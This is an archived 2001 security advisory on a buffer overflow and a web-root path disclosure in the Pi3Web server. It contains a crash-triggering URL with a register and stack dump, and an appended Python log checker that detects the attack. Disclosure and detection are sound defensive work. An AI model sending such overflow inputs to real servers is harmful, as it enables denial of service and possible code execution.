From: joetestaHUSHMAIL.COM
Date: Thu Feb 15 2001 - 22:21:07 CST


    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in Pi3Web Server

        Overview

    Pi3Web v1.0.1 is a web server available from http://www.zdnet.com. A
    vulnerability exists in the server's internal ISAPI handling procedures
    which results in a buffer overflow. The server also reveals the physical
    path of the web root upon encountering a 404 error.

        Details

    Here is an example URL that overflows a buffer in Pi3Web's executable:

            http://localhost/isapi/tstisapi.dll?[a lot of 'A's]

    This results in the following crash:

    ENHPI3 caused an invalid page fault in
    module <unknown> at 0000:41414141.
    Registers:
    EAX=00000001 CS=017f EIP=41414141 EFLGS=00010206
    EBX=0123d1b0 SS=0187 ESP=041df3b0 EBP=041dfed4
    ECX=00000000 DS=0187 ESI=041df3f0 FS=3e6f
    EDX=00000000 ES=0187 EDI=00000000 GS=0000
    Bytes at CS:EIP:

    Stack dump:
    41414141 41414141 41414141 41414141
    41414141 41414141 41414141 41414141
    41414141 41414141 41414141 41414141
    41414141 00bb0b2c 00000000 05611030

    To discover the physical path of the web root:

            http://localhost/[any string which causes a 404 error]

    The server responds with:

            The original URL path was:
            /sadfasdf

            The mapped physical path was:
            C:\PI3WEB\WebRoot\sadfasdf

        Solution

    The buffer overflow can be prevented by deleting the ISAPI module named
    'tstisapi.dll'. There is no quick solution for the web root disclosure.

        Vendor Status

    The author, John Roy, was contacted via <jproyWORLD.STD.COM> on Monday,
    February 5, 2001. No reply was received.

        - Joe Testa ( e-mail: joetestahushmail.com / AIM: LordSpankatron )

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

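A defender-side check for the two issues described in the advisory above, added here as an example and not part of the original message: it flags oversized query strings sent to tstisapi.dll in an access log and extracts the physical path from a 404 body. The Common Log Format, the 512-byte threshold, the function names and the sample data are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: the server writes Common Log Format; adjust REQ_RE otherwise.
MAX_QUERY_LEN = 512  # assumed threshold, tune to what legitimate clients send
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
# Wording taken from the 404 response quoted in the advisory.
LEAK_RE = re.compile(r"The mapped physical path was:\s*([A-Za-z]:\\[^\r\n<]*)")

def suspicious_isapi_requests(lines, max_query_len=MAX_QUERY_LEN):
    """Return (client, timestamp, query_length, status) for oversized tstisapi.dll queries."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, ts, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        # Decode %xx escapes so an encoded module name is still matched.
        if unquote(path).lower().endswith("/tstisapi.dll") and len(query) > max_query_len:
            hits.append((client, ts, len(query), int(status)))
    return hits

def leaked_web_root(body):
    """Return the physical path disclosed in a 404 body, or None if absent."""
    m = LEAK_RE.search(body)
    return m.group(1).strip() if m else None

# Constructed sample input (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Feb/2001:22:10:01 -0600] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [15/Feb/2001:22:10:05 -0600] "GET /isapi/tstisapi.dll?name=test HTTP/1.0" 200 512',
    '198.51.100.7 - - [15/Feb/2001:22:11:40 -0600] "GET /isapi/tstisapi.dll?'
    + "A" * 2000 + ' HTTP/1.0" 500 0',
]
SAMPLE_404 = ("The original URL path was:\n/sadfasdf\n\n"
              "The mapped physical path was:\nC:\\PI3WEB\\WebRoot\\sadfasdf\n")

if __name__ == "__main__":
    for hit in suspicious_isapi_requests(SAMPLE_LOG):
        print("oversized ISAPI query:", hit)
    print("disclosed path:", leaked_web_root(SAMPLE_404))
```

A request that crashes the server may never reach the access log, so treat this as a complement to crash reports like the one quoted above, not a replacement.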